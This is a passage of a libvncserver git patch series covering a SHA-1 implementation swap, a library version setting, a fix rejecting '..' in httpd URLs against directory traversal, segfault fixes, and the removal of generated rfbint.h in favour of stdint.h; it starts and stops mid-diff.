(!context->Computed) + SHA1Finalize(context, 0x80); + + for (i = 0; i < SHA1HashSize; ++i) + Message_Digest[i] = (uint8_t) (context->Intermediate_Hash[i>>2] + >> (8 * ( 3 - ( i & 0x03 ) ))); + + return shaSuccess; } +/* + * SHA1ProcessMessageBlock + * + * Description: + * This helper function will process the next 512 bits of the + * message stored in the Message_Block array. + * + * Parameters: + * context: [in/out] + * The SHA context to update. + * + * Returns: + * Nothing. + * + * Comments: + * Many of the variable names in this code, especially the + * single character names, were used because those were the + * names used in the Secure Hash Standard. + */ +static void SHA1ProcessMessageBlock(SHA1Context *context) +{ + /* Constants defined in FIPS 180-3, section 4.2.1 */ + const uint32_t K[4] = { + 0x5A827999, 0x6ED9EBA1, 0x8F1BBCDC, 0xCA62C1D6 + }; + + int t; /* Loop counter */ + uint32_t temp; /* Temporary word value */ + uint32_t W[80]; /* Word sequence */ + uint32_t A, B, C, D, E; /* Word buffers */ + + /* + * Initialize the first 16 words in the array W + */ + for (t = 0; t < 16; t++) { + W[t] = ((uint32_t)context->Message_Block[t * 4]) << 24; + W[t] |= ((uint32_t)context->Message_Block[t * 4 + 1]) << 16; + W[t] |= ((uint32_t)context->Message_Block[t * 4 + 2]) << 8; + W[t] |= ((uint32_t)context->Message_Block[t * 4 + 3]); + } + + for (t = 16; t < 80; t++) + W[t] = SHA1_ROTL(1, W[t-3] ^ W[t-8] ^ W[t-14] ^ W[t-16]); + + A = context->Intermediate_Hash[0]; + B = context->Intermediate_Hash[1]; + C = context->Intermediate_Hash[2]; + D = context->Intermediate_Hash[3]; + E = context->Intermediate_Hash[4]; + + for (t = 0; t < 20; t++) { + temp = SHA1_ROTL(5,A) + SHA_Ch(B, C, D) + E + W[t] + K[0]; + E = D; + D = C; + C = SHA1_ROTL(30,B); + B = A; + A = temp; + } + + for (t = 20; t < 40; t++) { + temp = SHA1_ROTL(5,A) + SHA_Parity(B, C, D) + E + W[t] + K[1]; + E = D; + D = C; + C = SHA1_ROTL(30,B); + B = A; + A = temp; + } + + for (t = 40; t < 60; t++) { + temp = SHA1_ROTL(5,A) + SHA_Maj(B, C, D) + E + W[t] + K[2]; + E = D; + D = C; + C = SHA1_ROTL(30,B); + B = A; + A = temp; + } + + for (t = 60; t < 80; t++) { + temp = SHA1_ROTL(5,A) + SHA_Parity(B, C, D) + E + W[t] + K[3]; + E = D; + D = C; + C = SHA1_ROTL(30,B); + B = A; + A = temp; + } + + context->Intermediate_Hash[0] += A; + context->Intermediate_Hash[1] += B; + context->Intermediate_Hash[2] += C; + context->Intermediate_Hash[3] += D; + context->Intermediate_Hash[4] += E; + context->Message_Block_Index = 0; +} /* - * SHA1PadMessage + * SHA1Finalize * - * Description: - * According to the standard, the message must be padded to an even - * 512 bits. The first padding bit must be a '1'. The last 64 - * bits represent the length of the original message. All bits in - * between should be 0. This function will pad the message - * according to those rules by filling the Message_Block array - * accordingly. It will also call the ProcessMessageBlock function - * provided appropriately. When it returns, it can be assumed that - * the message digest has been computed. + * Description: + * This helper function finishes off the digest calculations. * - * Parameters: - * context: [in/out] - * The context to pad - * ProcessMessageBlock: [in] - * The appropriate SHA*ProcessMessageBlock function - * Returns: - * Nothing. + * Parameters: + * context: [in/out] + * The SHA context to update. + * Pad_Byte: [in] + * The last byte to add to the message block before the 0-padding + * and length. This will contain the last bits of the message + * followed by another single bit. If the message was an + * exact multiple of 8-bits long, Pad_Byte will be 0x80. + * + * Returns: + * sha Error Code. * */ +static void SHA1Finalize(SHA1Context *context, uint8_t Pad_Byte) +{ + int i; + SHA1PadMessage(context, Pad_Byte); + /* message may be sensitive, clear it out */ + for (i = 0; i < SHA1_Message_Block_Size; ++i) + context->Message_Block[i] = 0; + context->Length_High = 0; /* and clear length */ + context->Length_Low = 0; + context->Computed = 1; +} -void SHA1PadMessage(SHA1Context *context) +/* + * SHA1PadMessage + * + * Description: + * According to the standard, the message must be padded to the next + * even multiple of 512 bits. The first padding bit must be a '1'. + * The last 64 bits represent the length of the original message. + * All bits in between should be 0. This helper function will pad + * the message according to those rules by filling the Message_Block + * array accordingly. When it returns, it can be assumed that the + * message digest has been computed. + * + * Parameters: + * context: [in/out] + * The context to pad. + * Pad_Byte: [in] + * The last byte to add to the message block before the 0-padding + * and length. This will contain the last bits of the message + * followed by another single bit. If the message was an + * exact multiple of 8-bits long, Pad_Byte will be 0x80. + * + * Returns: + * Nothing. + */ +static void SHA1PadMessage(SHA1Context *context, uint8_t Pad_Byte) { - /* - * Check to see if the current message block is too small to hold - * the initial padding bits and length. If so, we will pad the - * block, process it, and then continue padding into a second - * block. - */ - if (context->Message_Block_Index > 55) - { - context->Message_Block[context->Message_Block_Index++] = 0x80; - while(context->Message_Block_Index < 64) - { - context->Message_Block[context->Message_Block_Index++] = 0; - } - - SHA1ProcessMessageBlock(context); - - while(context->Message_Block_Index < 56) - { - context->Message_Block[context->Message_Block_Index++] = 0; - } - } - else - { - context->Message_Block[context->Message_Block_Index++] = 0x80; - while(context->Message_Block_Index < 56) - { - context->Message_Block[context->Message_Block_Index++] = 0; - } - } - - /* - * Store the message length as the last 8 octets - */ - context->Message_Block[56] = context->Length_High >> 24; - context->Message_Block[57] = context->Length_High >> 16; - context->Message_Block[58] = context->Length_High >> 8; - context->Message_Block[59] = context->Length_High; - context->Message_Block[60] = context->Length_Low >> 24; - context->Message_Block[61] = context->Length_Low >> 16; - context->Message_Block[62] = context->Length_Low >> 8; - context->Message_Block[63] = context->Length_Low; + /* + * Check to see if the current message block is too small to hold + * the initial padding bits and length. If so, we will pad the + * block, process it, and then continue padding into a second + * block. + */ + if (context->Message_Block_Index >= (SHA1_Message_Block_Size - 8)) { + context->Message_Block[context->Message_Block_Index++] = Pad_Byte; + while (context->Message_Block_Index < SHA1_Message_Block_Size) + context->Message_Block[context->Message_Block_Index++] = 0; SHA1ProcessMessageBlock(context); + } else + context->Message_Block[context->Message_Block_Index++] = Pad_Byte; + + while (context->Message_Block_Index < (SHA1_Message_Block_Size - 8)) + context->Message_Block[context->Message_Block_Index++] = 0; + + /* + * Store the message length as the last 8 octets + */ + context->Message_Block[56] = (uint8_t) (context->Length_High >> 24); + context->Message_Block[57] = (uint8_t) (context->Length_High >> 16); + context->Message_Block[58] = (uint8_t) (context->Length_High >> 8); + context->Message_Block[59] = (uint8_t) (context->Length_High); + context->Message_Block[60] = (uint8_t) (context->Length_Low >> 24); + context->Message_Block[61] = (uint8_t) (context->Length_Low >> 16); + context->Message_Block[62] = (uint8_t) (context->Length_Low >> 8); + context->Message_Block[63] = (uint8_t) (context->Length_Low); + + SHA1ProcessMessageBlock(context); } + diff --git a/common/sha1.h b/common/sha1.h deleted file mode 100644 index 1d49b1b..0000000 --- a/common/sha1.h +++ /dev/null @@ -1,101 +0,0 @@ -/* - * Copyright (C) The Internet Society (2001). All Rights Reserved. - * - * This document and translations of it may be copied and furnished to - * others, and derivative works that comment on or otherwise explain it - * or assist in its implementation may be prepared, copied, published - * and distributed, in whole or in part, without restriction of any - * kind, provided that the above copyright notice and this paragraph are - * included on all such copies and derivative works. However, this - * document itself may not be modified in any way, such as by removing - * the copyright notice or references to the Internet Society or other - * Internet organizations, except as needed for the purpose of - * developing Internet standards in which case the procedures for - * copyrights defined in the Internet Standards process must be - * followed, or as required to translate it into languages other than - * English. - * - * The limited permissions granted above are perpetual and will not be - * revoked by the Internet Society or its successors or assigns. - * - * This document and the information contained herein is provided on an - * "AS IS" basis and THE INTERNET SOCIETY AND THE INTERNET ENGINEERING - * TASK FORCE DISCLAIMS ALL WARRANTIES, EXPRESS OR IMPLIED, INCLUDING - * BUT NOT LIMITED TO ANY WARRANTY THAT THE USE OF THE INFORMATION - * HEREIN WILL NOT INFRINGE ANY RIGHTS OR ANY IMPLIED WARRANTIES OF - * MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE. - */ - -/* - * sha1.h - * - * Description: - * This is the header file for code which implements the Secure - * Hashing Algorithm 1 as defined in FIPS PUB 180-1 published - * April 17, 1995. - * - * Many of the variable names in this code, especially the - * single character names, were used because those were the names - * used in the publication. - * - * Please read the file sha1.c for more information. - * - */ - - -#ifndef _SHA1_H_ -#define _SHA1_H_ - -#include -/* - * If you do not have the ISO standard stdint.h header file, then you - * must typdef the following: - * name meaning - * uint32_t unsigned 32 bit integer - * uint8_t unsigned 8 bit integer (i.e., unsigned char) - * int_least16_t integer of >= 16 bits - * - */ - -#ifndef _SHA_enum_ -#define _SHA_enum_ -enum -{ - shaSuccess = 0, - shaNull, /* Null pointer parameter */ - shaInputTooLong, /* input data too long */ - shaStateError /* called Input after Result */ -}; -#endif -#define SHA1HashSize 20 - -/* - * This structure will hold context information for the SHA-1 - * hashing operation - */ -typedef struct SHA1Context -{ - uint32_t Intermediate_Hash[SHA1HashSize/4]; /* Message Digest */ - - uint32_t Length_Low; /* Message length in bits */ - uint32_t Length_High; /* Message length in bits */ - - /* Index into message block array */ - int_least16_t Message_Block_Index; - uint8_t Message_Block[64]; /* 512-bit message blocks */ - - int Computed; /* Is the digest computed? */ - int Corrupted; /* Is the message digest corrupted? */ -} SHA1Context; - -/* - * Function Prototypes - */ -int SHA1Reset( SHA1Context *); -int SHA1Input( SHA1Context *, - const uint8_t *, - unsigned int); -int SHA1Result( SHA1Context *, - uint8_t Message_Digest[SHA1HashSize]); - -#endif diff --git a/libvncserver/Makefile.am b/libvncserver/Makefile.am index cb38c64..38426af 100644 --- a/libvncserver/Makefile.am +++ b/libvncserver/Makefile.am @@ -37,7 +37,7 @@ include_HEADERS=../rfb/rfb.h ../rfb/rfbconfig.h ../rfb/rfbint.h \ noinst_HEADERS=../common/d3des.h ../rfb/default8x16.h zrleoutstream.h \ zrlepalettehelper.h zrletypes.h private.h scale.h rfbssl.h rfbcrypto.h \ - ../common/minilzo.h ../common/lzoconf.h ../common/lzodefs.h ../common/md5.h ../common/sha1.h \ + ../common/minilzo.h ../common/lzoconf.h ../common/lzodefs.h ../common/md5.h ../common/sha.h ../common/sha-private.h \ $(TIGHTVNCFILETRANSFERHDRS) EXTRA_DIST=tableinit24.c tableinittctemplate.c tabletranstemplate.c \ diff --git a/libvncserver/rfbcrypto_included.c b/libvncserver/rfbcrypto_included.c index 58c2e93..7feff61 100644 --- a/libvncserver/rfbcrypto_included.c +++ b/libvncserver/rfbcrypto_included.c @@ -23,7 +23,7 @@ #include #include "md5.h" -#include "sha1.h" +#include "sha.h" #include "rfbcrypto.h" void digestmd5(const struct iovec *iov, int iovcnt, void *dest) -- cgit v1.2.3 From 344264da2facfd2ffba4e2f567be6d2c14b6d63b Mon Sep 17 00:00:00 2001 From: Peter Spiess-Knafl Date: Mon, 9 Feb 2015 13:43:59 +0100 Subject: Set autotools SOVERSION. --- libvncclient/Makefile.am | 2 +- libvncserver/Makefile.am | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) (limited to 'libvncserver') diff --git a/libvncclient/Makefile.am b/libvncclient/Makefile.am index 76bed21..d458aa2 100644 --- a/libvncclient/Makefile.am +++ b/libvncclient/Makefile.am @@ -25,5 +25,5 @@ EXTRA_DIST=corre.c hextile.c rre.c tight.c zlib.c zrle.c ultra.c tls_gnutls.c tl $(libvncclient_la_OBJECTS): ../rfb/rfbclient.h lib_LTLIBRARIES=libvncclient.la - +libvncclient_la_LDFLAGS = -version-info 1:0:0 diff --git a/libvncserver/Makefile.am b/libvncserver/Makefile.am index 38426af..de87ef3 100644 --- a/libvncserver/Makefile.am +++ b/libvncserver/Makefile.am @@ -61,6 +61,7 @@ libvncserver_la_SOURCES=$(LIB_SRCS) libvncserver_la_LIBADD=$(WEBSOCKETSSSLLIBS) lib_LTLIBRARIES=libvncserver.la +libvncserver_la_LDFLAGS = -version-info 1:0:0 if HAVE_RPM $(PACKAGE)-$(VERSION).tar.gz: dist -- cgit v1.2.3 From f5ae94639bad542e6ae2b57495cb975bd8feb45e Mon Sep 17 00:00:00 2001 From: Floris Bos Date: Sun, 29 Mar 2015 21:02:25 +0200 Subject: httpd: disallow directory traversal Signed-off-by: Floris Bos --- libvncserver/httpd.c | 8 ++++++++ 1 file changed, 8 insertions(+) (limited to 'libvncserver') diff --git a/libvncserver/httpd.c b/libvncserver/httpd.c index 12d71a8..2a778e7 100644 --- a/libvncserver/httpd.c +++ b/libvncserver/httpd.c @@ -423,6 +423,14 @@ httpProcessInput(rfbScreenInfoPtr rfbScreen) } } + /* Basic protection against directory traversal outside webroot */ + + if (strstr(fname, "..")) { + rfbErr("httpd: URL should not contain '..'\n"); + rfbWriteExact(&cl, NOT_FOUND_STR, strlen(NOT_FOUND_STR)); + httpCloseSock(rfbScreen); + return; + } /* If we were asked for '/', actually read the file index.vnc */ -- cgit v1.2.3 From 4c1bd4e76e0cdbb61b38e31d408fff86a3203433 Mon Sep 17 00:00:00 2001 From: Benjamin Dürholt Date: Fri, 10 Apr 2015 12:16:15 +0200 Subject: prevent segfault --- libvncserver/rfbssl_gnutls.c | 2 ++ libvncserver/tight.c | 6 +++++- 2 files changed, 7 insertions(+), 1 deletion(-) (limited to 'libvncserver') diff --git a/libvncserver/rfbssl_gnutls.c b/libvncserver/rfbssl_gnutls.c index cf60cdc..fb3a0e7 100644 --- a/libvncserver/rfbssl_gnutls.c +++ b/libvncserver/rfbssl_gnutls.c @@ -109,6 +109,8 @@ struct rfbssl_ctx *rfbssl_init_global(char *key, char *cert) gnutls_global_set_log_function(rfbssl_log_func); gnutls_global_set_log_level(1); gnutls_certificate_set_dh_params(ctx->x509_cred, ctx->dh_params); + //newly allocated memory should be initialized, at least where it is important + ctx->peekstart = ctx->peeklen = 0; return ctx; } diff --git a/libvncserver/tight.c b/libvncserver/tight.c index 276a2e3..8eb7380 100644 --- a/libvncserver/tight.c +++ b/libvncserver/tight.c @@ -163,7 +163,11 @@ void rfbTightCleanup (rfbScreenInfoPtr screen) tightAfterBufSize = 0; tightAfterBuf = NULL; } - if (j) tjDestroy(j); + if (j) { + tjDestroy(j); + //Set freed resource handle to 0! + j = 0; + } } -- cgit v1.2.3 From 97490d68b024d76f2ebb52d59ffb1e8acc399d5e Mon Sep 17 00:00:00 2001 From: Benjamin Dürholt Date: Mon, 13 Apr 2015 11:45:24 +0200 Subject: Changed C++ style comments to C ones --- libvncserver/rfbssl_gnutls.c | 2 +- libvncserver/tight.c | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) (limited to 'libvncserver') diff --git a/libvncserver/rfbssl_gnutls.c b/libvncserver/rfbssl_gnutls.c index fb3a0e7..e58cdad 100644 --- a/libvncserver/rfbssl_gnutls.c +++ b/libvncserver/rfbssl_gnutls.c @@ -109,7 +109,7 @@ struct rfbssl_ctx *rfbssl_init_global(char *key, char *cert) gnutls_global_set_log_function(rfbssl_log_func); gnutls_global_set_log_level(1); gnutls_certificate_set_dh_params(ctx->x509_cred, ctx->dh_params); - //newly allocated memory should be initialized, at least where it is important + /* newly allocated memory should be initialized, at least where it is important */ ctx->peekstart = ctx->peeklen = 0; return ctx; } diff --git a/libvncserver/tight.c b/libvncserver/tight.c index 8eb7380..89a7f25 100644 --- a/libvncserver/tight.c +++ b/libvncserver/tight.c @@ -165,7 +165,7 @@ void rfbTightCleanup (rfbScreenInfoPtr screen) } if (j) { tjDestroy(j); - //Set freed resource handle to 0! + /* Set freed resource handle to 0! */ j = 0; } } -- cgit v1.2.3 From 92f558482d94c5152174a1983a40863bd6b07911 Mon Sep 17 00:00:00 2001 From: Christian Beier Date: Thu, 28 May 2015 15:34:10 +0200 Subject: Do away with rfbint.h generation and use stdint.h directly instead. --- .gitignore | 1 - CMakeLists.txt | 2 - Doxyfile | 1 - Makefile.am | 5 +- configure.ac | 7 +- libvncserver/Makefile.am | 3 +- m4/ax_create_stdint_h.m4 | 727 ----------------------------------------------- rfb/rfbproto.h | 3 - 8 files changed, 4 insertions(+), 745 deletions(-) delete mode 100644 m4/ax_create_stdint_h.m4 (limited to 'libvncserver') diff --git a/.gitignore b/.gitignore index 4c391b5..fccd7af 100644 --- a/.gitignore +++ b/.gitignore @@ -61,7 +61,6 @@ examples/vncev libtool libvncclient/libvncclient.la libvncserver/libvncserver.la -rfb/rfbint.h test/blooptest test/cargstest test/copyrecttest diff --git a/CMakeLists.txt b/CMakeLists.txt index 9486f65..338f0ba 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -170,7 +170,6 @@ TEST_BIG_ENDIAN(LIBVNCSERVER_WORDS_BIGENDIAN) # inline configure_file(${CMAKE_CURRENT_SOURCE_DIR}/rfb/rfbconfig.h.cmake ${CMAKE_BINARY_DIR}/rfb/rfbconfig.h) -configure_file(${CMAKE_CURRENT_SOURCE_DIR}/rfb/rfbint.h.cmake ${CMAKE_BINARY_DIR}/rfb/rfbint.h) set(LIBVNCSERVER_SOURCES ${LIBVNCSERVER_DIR}/main.c @@ -375,7 +374,6 @@ install_files(/include/rfb FILES rfb/rfb.h rfb/rfbclient.h rfb/rfbconfig.h - rfb/rfbint.h rfb/rfbproto.h rfb/rfbregion.h ) diff --git a/Doxyfile b/Doxyfile index 2f17954..09c6fcc 100644 --- a/Doxyfile +++ b/Doxyfile @@ -661,7 +661,6 @@ RECURSIVE = YES # subdirectory from a directory tree whose root is specified with the INPUT tag. EXCLUDE = rfb/rfbconfig.h \ - rfb/rfbint.h \ rfb/default8x16.h # The EXCLUDE_SYMLINKS tag can be used select whether or not files or diff --git a/Makefile.am b/Makefile.am index 5c2a94d..a7bc64d 100644 --- a/Makefile.am +++ b/Makefile.am @@ -2,7 +2,7 @@ ACLOCAL_AMFLAGS = -I m4 SUBDIRS=libvncserver examples libvncclient webclients client_examples test DIST_SUBDIRS=libvncserver examples libvncclient webclients client_examples test -EXTRA_DIST = CMakeLists.txt rfb/rfbint.h.cmake rfb/rfbconfig.h.cmake +EXTRA_DIST = CMakeLists.txt rfb/rfbconfig.h.cmake bin_SCRIPTS = libvncserver-config @@ -10,9 +10,8 @@ pkgconfigdir = $(libdir)/pkgconfig pkgconfig_DATA = libvncserver.pc libvncclient.pc includedir=$(prefix)/include/rfb -#include_HEADERS=rfb.h rfbconfig.h rfbint.h rfbproto.h keysym.h rfbregion.h -include_HEADERS=rfb/rfb.h rfb/rfbconfig.h rfb/rfbint.h rfb/rfbproto.h \ +include_HEADERS=rfb/rfb.h rfb/rfbconfig.h rfb/rfbproto.h \ rfb/keysym.h rfb/rfbregion.h rfb/rfbclient.h $(PACKAGE)-$(VERSION).tar.gz: dist diff --git a/configure.ac b/configure.ac index 0960e7e..6e60a0f 100644 --- a/configure.ac +++ b/configure.ac @@ -498,7 +498,7 @@ fi # Checks for header files. AC_HEADER_STDC -AC_CHECK_HEADERS([arpa/inet.h endian.h fcntl.h netdb.h netinet/in.h stdlib.h string.h sys/endian.h sys/socket.h sys/time.h sys/timeb.h syslog.h unistd.h ws2tcpip.h]) +AC_CHECK_HEADERS([arpa/inet.h endian.h fcntl.h netdb.h netinet/in.h stdlib.h stdint.h string.h sys/endian.h sys/socket.h sys/time.h sys/timeb.h syslog.h unistd.h ws2tcpip.h]) # Checks for typedefs, structures, and compiler characteristics. AC_C_CONST @@ -508,11 +508,6 @@ AC_TYPE_SIZE_T AC_HEADER_TIME AC_HEADER_SYS_WAIT AX_TYPE_SOCKLEN_T -if test ! -d ./rfb; then - echo "creating subdir ./rfb for rfbint.h" - mkdir ./rfb -fi -AX_CREATE_STDINT_H(rfb/rfbint.h) AC_CACHE_CHECK([for in_addr_t], vnc_cv_inaddrt, [ AC_TRY_COMPILE([#include diff --git a/libvncserver/Makefile.am b/libvncserver/Makefile.am index de87ef3..2f23e31 100644 --- a/libvncserver/Makefile.am +++ b/libvncserver/Makefile.am @@ -30,9 +30,8 @@ WEBSOCKETSSRCS = websockets.c $(WEBSOCKETSSSLSRCS) endif includedir=$(prefix)/include/rfb -#include_HEADERS=rfb.h rfbconfig.h rfbint.h rfbproto.h keysym.h rfbregion.h -include_HEADERS=../rfb/rfb.h ../rfb/rfbconfig.h ../rfb/rfbint.h \ +include_HEADERS=../rfb/rfb.h ../rfb/rfbconfig.h \ ../rfb/rfbproto.h ../rfb/keysym.h ../rfb/rfbregion.h ../rfb/rfbclient.h noinst_HEADERS=../common/d3des.h ../rfb/default8x16.h zrleoutstream.h \ diff --git a/m4/ax_create_stdint_h.m4 b/m4/ax_create_stdint_h.m4 deleted file mode 100644 index 33a21f8..0000000 --- a/m4/ax_create_stdint_h.m4 +++ /dev/null @@ -1,727 +0,0 @@ -# =========================================================================== -# http://www.gnu.org/software/autoconf-archive/ax_create_stdint_h.html -# =========================================================================== -# -# SYNOPSIS -# -# AX_CREATE_STDINT_H [( HEADER-TO-GENERATE [, HEDERS-TO-CHECK])] -# -# DESCRIPTION -# -# the "ISO C9X: 7.18 Integer types " section requires the -# existence of an include file that defines a set of typedefs, -# especially uint8_t,int32_t,uintptr_t. Many older installations will not -# provide this file, but some will have the very same definitions in -# . In other enviroments we can use the inet-types in -# which would define the typedefs int8_t and u_int8_t -# respectivly. -# -# This macros will create a local "_stdint.h" or the headerfile given as -# an argument. In many cases that file will just "#include " or -# "#include ", while in other environments it will provide the -# set of basic 'stdint's definitions/typedefs: -# -# int8_t,uint8_t,int16_t,uint16_t,int32_t,uint32_t,intptr_t,uintptr_t -# int_least32_t.. int_fast32_t.. intmax_t -# -# which may or may not rely on the definitions of other files, or using -# the AC_CHECK_SIZEOF macro to determine the actual sizeof each type. -# -# if your header files require the stdint-types you will want to create an -# installable file mylib-int.h that all your other installable header may -# include. So if you have a library package named "mylib", just use -# -# AX_CREATE_STDINT_H(mylib-int.h) -# -# in configure.ac and go to install that very header file in Makefile.am -# along with the other headers (mylib.h) - and the mylib-specific headers -# can simply use "#include " to obtain the stdint-types. -# -# Remember, if the system already had a valid , the generated -# file will include it directly. No need for fuzzy HAVE_STDINT_H things... -# (oops, GCC 4.2.x has deliberatly disabled its stdint.h for non-c99 -# compilation and the c99-mode is not the default. Therefore this macro -# will not use the compiler's stdint.h - please complain to the GCC -# developers). -# -# LICENSE -# -# Copyright (c) 2008 Guido U. Draheim -# -# This program is free software; you can redistribute it and/or modify it -# under the terms of the GNU General Public License as published by the -# Free Software Foundation; either version 3 of the License, or (at your -# option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General -# Public License for more details. -# -# You should have received a copy of the GNU General Public License along -# with this program. If not, see . -# -# As a special exception, the respective Autoconf Macro's copyright owner -# gives unlimited permission to copy, distribute and modify the configure -# scripts that are the output of Autoconf when processing the Macro. You -# need not follow the terms of the GNU General Public License when using -# or distributing such scripts, even though portions of the text of the -# Macro appear in them. The GNU General Public License (GPL) does govern -# all other use of the material that constitutes the Autoconf Macro. -# -# This special exception to the GPL applies to versions of the Autoconf -# Macro released by the Autoconf Archive. When you make and distribute a -# modified version of the Autoconf Macro, you may extend this special -# exception to the GPL to apply to your modified version as well. - -#serial 10 - -AC_DEFUN([AX_CHECK_DATA_MODEL],[ - AC_CHECK_SIZEOF(char) - AC_CHECK_SIZEOF(short) - AC_CHECK_SIZEOF(int) - AC_CHECK_SIZEOF(long) - AC_CHECK_SIZEOF(void*) - ac_cv_char_data_model="" - ac_cv_char_data_model="$ac_cv_char_data_model$ac_cv_sizeof_char" - ac_cv_char_data_model="$ac_cv_char_data_model$ac_cv_sizeof_short" - ac_cv_char_data_model="$ac_cv_char_data_model$ac_cv_sizeof_int" - ac_cv_long_data_model="" - ac_cv_long_data_model="$ac_cv_long_data_model$ac_cv_sizeof_int" - ac_cv_long_data_model="$ac_cv_long_data_model$ac_cv_sizeof_long" - ac_cv_long_data_model="$ac_cv_long_data_model$ac_cv_sizeof_voidp" - AC_MSG_CHECKING([data model]) - case "$ac_cv_char_data_model/$ac_cv_long_data_model" in - 122/242) ac_cv_data_model="IP16" ; n="standard 16bit machine" ;; - 122/244) ac_cv_data_model="LP32" ; n="standard 32bit machine" ;; - 122/*) ac_cv_data_model="i16" ; n="unusual int16 model" ;; - 124/444) ac_cv_data_model="ILP32" ; n="standard 32bit unixish" ;; - 124/488) ac_cv_data_model="LP64" ; n="standard 64bit unixish" ;; - 124/448) ac_cv_data_model="LLP64" ; n="unusual 64bit unixish" ;; - 124/*) ac_cv_data_model="i32" ; n="unusual int32 model" ;; - 128/888) ac_cv_data_model="ILP64" ; n="unusual 64bit numeric" ;; - 128/*) ac_cv_data_model="i64" ; n="unusual int64 model" ;; - 222/*2) ac_cv_data_model="DSP16" ; n="strict 16bit dsptype" ;; - 333/*3) ac_cv_data_model="DSP24" ; n="strict 24bit dsptype" ;; - 444/*4) ac_cv_data_model="DSP32" ; n="strict 32bit dsptype" ;; - 666/*6) ac_cv_data_model="DSP48" ; n="strict 48bit dsptype" ;; - 888/*8) ac_cv_data_model="DSP64" ; n="strict 64bit dsptype" ;; - 222/*|333/*|444/*|666/*|888/*) : - ac_cv_data_model="iDSP" ; n="unusual dsptype" ;; - *) ac_cv_data_model="none" ; n="very unusual model" ;; - esac - AC_MSG_RESULT([$ac_cv_data_model ($ac_cv_long_data_model, $n)]) -]) - -dnl AX_CHECK_HEADER_STDINT_X([HEADERLIST][,ACTION-IF]) -AC_DEFUN([AX_CHECK_HEADER_STDINT_X],[ -AC_CACHE_CHECK([for stdint uintptr_t], [ac_cv_header_stdint_x],[ - ac_cv_header_stdint_x="" # the 1997 typedefs (inttypes.h) - AC_MSG_RESULT([(..)]) - for i in m4_ifval([$1],[$1],[stdint.h inttypes.h sys/inttypes.h sys/types.h]) - do - unset ac_cv_type_uintptr_t - unset ac_cv_type_uint64_t - AC_CHECK_TYPE(uintptr_t,[ac_cv_header_stdint_x=$i],continue,[#include <$i>]) - AC_CHECK_TYPE(uint64_t,[and64="/uint64_t"],[and64=""],[#include<$i>]) - m4_ifvaln([$2],[$2]) break - done - AC_MSG_CHECKING([for stdint uintptr_t]) - ]) -]) - -AC_DEFUN([AX_CHECK_HEADER_STDINT_O],[ -AC_CACHE_CHECK([for stdint uint32_t], [ac_cv_header_stdint_o],[ - ac_cv_header_stdint_o="" # the 1995 typedefs (sys/inttypes.h) - AC_MSG_RESULT([(..)]) - for i in m4_ifval([$1],[$1],[inttypes.h sys/inttypes.h sys/types.h stdint.h]) - do - unset ac_cv_type_uint32_t - unset ac_cv_type_uint64_t - AC_CHECK_TYPE(uint32_t,[ac_cv_header_stdint_o=$i],continue,[#include <$i>]) - AC_CHECK_TYPE(uint64_t,[and64="/uint64_t"],[and64=""],[#include<$i>]) - m4_ifvaln([$2],[$2]) break - break; - done - AC_MSG_CHECKING([for stdint uint32_t]) - ]) -]) - -AC_DEFUN([AX_CHECK_HEADER_STDINT_U],[ -AC_CACHE_CHECK([for stdint u_int32_t], [ac_cv_header_stdint_u],[ - ac_cv_header_stdint_u="" # the BSD typedefs (sys/types.h) - AC_MSG_RESULT([(..)]) - for i in m4_ifval([$1],[$1],[sys/types.h inttypes.h sys/inttypes.h]) ; do - unset ac_cv_type_u_int32_t - unset ac_cv_type_u_int64_t - AC_CHECK_TYPE(u_int32_t,[ac_cv_header_stdint_u=$i],continue,[#include <$i>]) - AC_CHECK_TYPE(u_int64_t,[and64="/u_int64_t"],[and64=""],[#include<$i>]) - m4_ifvaln([$2],[$2]) break - break; - done - AC_MSG_CHECKING([for stdint u_int32_t]) - ]) -]) - -AC_DEFUN([AX_CREATE_STDINT_H], -[# ------ AX CREATE STDINT H ------------------------------------- -AC_MSG_CHECKING([for stdint types]) -ac_stdint_h=`echo ifelse($1, , _stdint.h, $1)` -# try to shortcircuit - if the default include path of the compiler -# can find a "stdint.h" header then we assume that all compilers can. -AC_CACHE_VAL([ac_cv_header_stdint_t],[ -old_CXXFLAGS="$CXXFLAGS" ; CXXFLAGS="" -old_CPPFLAGS="$CPPFLAGS" ; CPPFLAGS="" -old_CFLAGS="$CFLAGS" ; CFLAGS="" -AC_TRY_COMPILE([#include ],[int_least32_t v = 0;], -[ac_cv_stdint_result="(assuming C99 compatible system)" - ac_cv_header_stdint_t="stdint.h"; ], -[ac_cv_header_stdint_t=""]) -if test "$GCC" = "yes" && test ".$ac_cv_header_stdint_t" = "."; then -CFLAGS="-std=c99" -AC_TRY_COMPILE([#include ],[int_least32_t v = 0;], -[AC_MSG_WARN(your GCC compiler has a defunct stdint.h for its default-mode)]) -fi -CXXFLAGS="$old_CXXFLAGS" -CPPFLAGS="$old_CPPFLAGS" -CFLAGS="$old_CFLAGS" ]) - -v="... $ac_cv_header_stdint_h" -if test "$ac_stdint_h" = "stdint.h" ; then - AC_MSG_RESULT([(are you sure you want them in ./stdint.h?)]) -elif test "$ac_stdint_h" = "inttypes.h" ; then - AC_MSG_RESULT([(are you sure you want them in ./inttypes.h?)]) -elif test "_$ac_cv_header_stdint_t" = "_" ; then - AC_MSG_RESULT([(putting them into $ac_stdint_h)$v]) -else - ac_cv_header_stdint="$ac_cv_header_stdint_t" - AC_MSG_RESULT([$ac_cv_header_stdint (shortcircuit)]) -fi - -if test "_$ac_cv_header_stdint_t" = "_" ; then # cannot shortcircuit.. - -dnl .....intro message done, now do a few system checks..... -dnl btw, all old CHECK_TYPE macros do automatically "DEFINE" a type, -dnl therefore we use the autoconf implementation detail CHECK_TYPE_NEW -dnl instead that is triggered with 3 or more arguments (see types.m4) - -inttype_headers=`echo $2 | sed -e 's/,/ /g'` - -ac_cv_stdint_result="(no helpful system typedefs seen)" -AX_CHECK_HEADER_STDINT_X(dnl - stdint.h inttypes.h sys/inttypes.h $inttype_headers, - ac_cv_stdint_result="(seen uintptr_t$and64 in $i)") - -if test "_$ac_cv_header_stdint_x" = "_" ; then -AX_CHECK_HEADER_STDINT_O(dnl, - 